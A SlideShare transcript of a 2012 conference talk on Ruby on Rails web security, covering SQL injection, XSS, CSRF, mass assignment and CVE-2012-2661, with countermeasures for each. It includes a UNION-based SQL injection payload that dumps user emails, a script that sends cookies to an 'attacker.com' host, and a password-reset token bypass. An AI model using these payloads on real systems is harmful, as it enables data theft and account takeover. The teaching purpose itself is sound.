SlideShare a Scribd company logo

Web Application Security in Rails

Uri Nativ
Uri Nativ

This document summarizes common web application security vulnerabilities in Ruby on Rails such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), mass assignment, and CVE-2012-2661. It provides examples of these vulnerabilities and discusses countermeasures like input sanitization, access control, CSRF tokens, whitelisting attributes, and upgrading Rails versions. The document concludes by recommending following Rails security best practices and resources for learning about securing Rails applications.

1 of 48
Download to read offline
WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012
Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael
Buy Now, Pay Later 1.  Shop online 2.  Receive your goods 3.  Pay
Alice
Bob
Alice and Bob
Alice and Bob
Alice and Bob Like Duh?
Alice and Bob <html> <title> #$@# MicroBlogging %#@&*#$ </title> ...
Alice and Bob Hack it!
SQL INJECTION
SQL Injection @results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’ WHERE (content LIKE ’%SEARCHSTRING%’)
SQL Injection SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
SQL Injection SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection - countermeasures @results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all
CROSS SITE XSS SCRIPTING
XSS <span class="content"> <%= raw feed_item.content %> </span>
XSS <script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>
XSS - countermeasures <span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span>
XSS The Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem)
CROSS CSRF SITE REQUEST FORGERY
CSRF www.blog.com 1
CSRF www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> 2 Click here for free iPad
CSRF www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() 3 </script>
CSRF www.blog.com www.freeiPad.com POST /blogpost <form name=“evilform” Content=“Kick Me!” action=“www.blog.com/….”> … <script> document.evilform.submit() 4 </script>
CSRF – Authenticity Token <input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ />
CSRF routes.rb match '/delete_post/:id', to: 'microposts#destroy'
CSRF class ApplicationController < ActionController::Base # commented to easily test forms # protect_from_forgery ... end
CSRF The Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link
RAILS SPECIFIC ATTACKS
MASS boo[gotcha!] ASSIGNMENT
Mass Assignment def create @user = User.new(params[:user]) ... end
Mass Assignment def create @user = User.new(params[:user]) ... end { :name => “gotcha”, :admin => true }
Mass Assignment - countermeasures Blacklist class User < ActiveRecord::Base attr_protected :admin ... end
Mass Assignment - countermeasures Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation ...
Mass Assignment - countermeasures Global Config (whitelist) config.active_record. whitelist_attributes = true
Mass Assignment The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
CVE-2012-2661 SQL Injection User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1
CVE-2012-2661 SQL Injection /users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
CVE-2012-2661 SQL Injection The Attack: SQL Injection - Affected version: Rails < 3.2.4 Countermeasures: Upgrade to Rails 3.2.4 or higher
Brakeman ------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross Site Scripting |2 | | Cross-Site Request Forgery | 1 | | Denial of Service |1 | | Redirect |1 | | SQL Injection |4 | -------------------------------------------------
CONCLUSIONS
Make Love not War
Conclusions Know the threats – OWASP top 10 Follow Rails conventions Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security
Thanks to… Daniel Amselem for pair programming Irit Shainzinger for the cool graphics Michael Hartl for his microblogging app tutorial
Pay Online – Safer and Simpler https://github.com/unativ/sample_app

Recommended

XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection Vulnerabilities
Mindfire Solutions
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
Simon Willison
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2
Abhishek Kumar
 
S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会
S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会
S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会
Ryuichi Tokugami
 
In graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challengesIn graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challenges
Mohammed A. Imran
 
JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...
JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...
JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...
Yusuke Yamamoto
 

Recommended

XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection Vulnerabilities
Mindfire Solutions
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
Simon Willison
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2XSS Defeating Concept - Part 2
XSS Defeating Concept - Part 2
Abhishek Kumar
 
S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会
S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会
S3解説 - 第1回 ビギナー編 AWS User Group - Japan 東京勉強会
Ryuichi Tokugami
 
In graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challengesIn graph we trust: Microservices, GraphQL and security challenges
In graph we trust: Microservices, GraphQL and security challenges
Mohammed A. Imran
 
JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...
JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...
JavaOne2016 #CON5929 Time-Saving Tips and Tricks for Building Quality Java Ap...
Yusuke Yamamoto
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)
Ömer Çıtak
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developers
Ran Bar-Zik
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
Nitroxis Sprl
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
Introduction to Retrofit
Introduction to RetrofitIntroduction to Retrofit
Introduction to Retrofit
Kazuhiro Serizawa
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
Aaron Weaver
 
Webpack
Webpack Webpack
Webpack
Sofian Hadiwijaya
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
HyungTae Lim
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
Sumedt Jitpukdebodin
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
vodQA
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Click jacking
Click jackingClick jacking
Click jacking
Ronan Dunne, CEH, SSCP
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
HyungTae Lim
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
Mostafa Siraj
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
Ferruh Mavituna
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
Test automation
Test automationTest automation
Test automation
Kaushik Banerjee
 
Stop Optimizing Start Simplifying
Stop Optimizing Start SimplifyingStop Optimizing Start Simplifying
Stop Optimizing Start Simplifying
Uri Nativ
 
Using scrum values to building engineering culture
Using scrum values to building engineering cultureUsing scrum values to building engineering culture
Using scrum values to building engineering culture
Uri Nativ
 

More Related Content

What's hot

Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)
Ömer Çıtak
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developers
Ran Bar-Zik
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
Nitroxis Sprl
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
Introduction to Retrofit
Introduction to RetrofitIntroduction to Retrofit
Introduction to Retrofit
Kazuhiro Serizawa
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
Aaron Weaver
 
Webpack
Webpack Webpack
Webpack
Sofian Hadiwijaya
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
HyungTae Lim
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
Sumedt Jitpukdebodin
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
vodQA
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
Click jacking
Click jackingClick jacking
Click jacking
Ronan Dunne, CEH, SSCP
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
HyungTae Lim
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
Mostafa Siraj
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
Ferruh Mavituna
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
Test automation
Test automationTest automation
Test automation
Kaushik Banerjee
 

What's hot (20)

Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developers
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Introduction to Retrofit
Introduction to RetrofitIntroduction to Retrofit
Introduction to Retrofit
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
 
Webpack
Webpack Webpack
Webpack
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
 
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo) Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Click jacking
Click jackingClick jacking
Click jacking
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
Test automation
Test automationTest automation
Test automation
 

Viewers also liked

Stop Optimizing Start Simplifying
Stop Optimizing Start SimplifyingStop Optimizing Start Simplifying
Stop Optimizing Start Simplifying
Uri Nativ
 
Using scrum values to building engineering culture
Using scrum values to building engineering cultureUsing scrum values to building engineering culture
Using scrum values to building engineering culture
Uri Nativ
 
The Missing (Agile) Lecture
The Missing (Agile) LectureThe Missing (Agile) Lecture
The Missing (Agile) Lecture
Uri Nativ
 
Pair Programming at Klarna Tel Aviv
Pair Programming at Klarna Tel AvivPair Programming at Klarna Tel Aviv
Pair Programming at Klarna Tel Aviv
Uri Nativ
 
QA without QA
QA without QAQA without QA
QA without QA
Uri Nativ
 
Where is the CEO Office?
Where is the CEO Office?Where is the CEO Office?
Where is the CEO Office?
Uri Nativ
 
Agile - What? Why? How?
Agile - What? Why? How?Agile - What? Why? How?
Agile - What? Why? How?
Uri Nativ
 
Building an Awesome Engineering Culture
Building an Awesome Engineering CultureBuilding an Awesome Engineering Culture
Building an Awesome Engineering Culture
Uri Nativ
 
5 Slides Design Tips
5 Slides Design Tips5 Slides Design Tips
5 Slides Design Tips
Uri Nativ
 
Dodging Bullets
Dodging BulletsDodging Bullets
Dodging Bullets
Uri Nativ
 
Codeware
CodewareCodeware
Codeware
Uri Nativ
 

Viewers also liked (11)

Stop Optimizing Start Simplifying
Stop Optimizing Start SimplifyingStop Optimizing Start Simplifying
Stop Optimizing Start Simplifying
 
Using scrum values to building engineering culture
Using scrum values to building engineering cultureUsing scrum values to building engineering culture
Using scrum values to building engineering culture
 
The Missing (Agile) Lecture
The Missing (Agile) LectureThe Missing (Agile) Lecture
The Missing (Agile) Lecture
 
Pair Programming at Klarna Tel Aviv
Pair Programming at Klarna Tel AvivPair Programming at Klarna Tel Aviv
Pair Programming at Klarna Tel Aviv
 
QA without QA
QA without QAQA without QA
QA without QA
 
Where is the CEO Office?
Where is the CEO Office?Where is the CEO Office?
Where is the CEO Office?
 
Agile - What? Why? How?
Agile - What? Why? How?Agile - What? Why? How?
Agile - What? Why? How?
 
Building an Awesome Engineering Culture
Building an Awesome Engineering CultureBuilding an Awesome Engineering Culture
Building an Awesome Engineering Culture
 
5 Slides Design Tips
5 Slides Design Tips5 Slides Design Tips
5 Slides Design Tips
 
Dodging Bullets
Dodging BulletsDodging Bullets
Dodging Bullets
 
Codeware
CodewareCodeware
Codeware
 

Similar to Web Application Security in Rails

&lt;x> Rails Web App Security Title
&lt;x> Rails Web App Security Title&lt;x> Rails Web App Security Title
&lt;x> Rails Web App Security Title
'"><x> '"><x>
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
SharePointRadi
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
Chris Shiflett
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
Steven Van den Hout
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Grand Parade Poland
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Application Security from the Inside - OWASP
Application Security from the Inside - OWASPApplication Security from the Inside - OWASP
Application Security from the Inside - OWASP
Sqreen
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
jaxconf
 

Similar to Web Application Security in Rails (20)

&lt;x> Rails Web App Security Title
&lt;x> Rails Web App Security Title&lt;x> Rails Web App Security Title
&lt;x> Rails Web App Security Title
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Application Security from the Inside - OWASP
Application Security from the Inside - OWASPApplication Security from the Inside - OWASP
Application Security from the Inside - OWASP
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Java EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank KimJava EE Web Security By Example: Frank Kim
Java EE Web Security By Example: Frank Kim
 
Brakeman
BrakemanBrakeman
Brakeman
 

Recently uploaded

Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
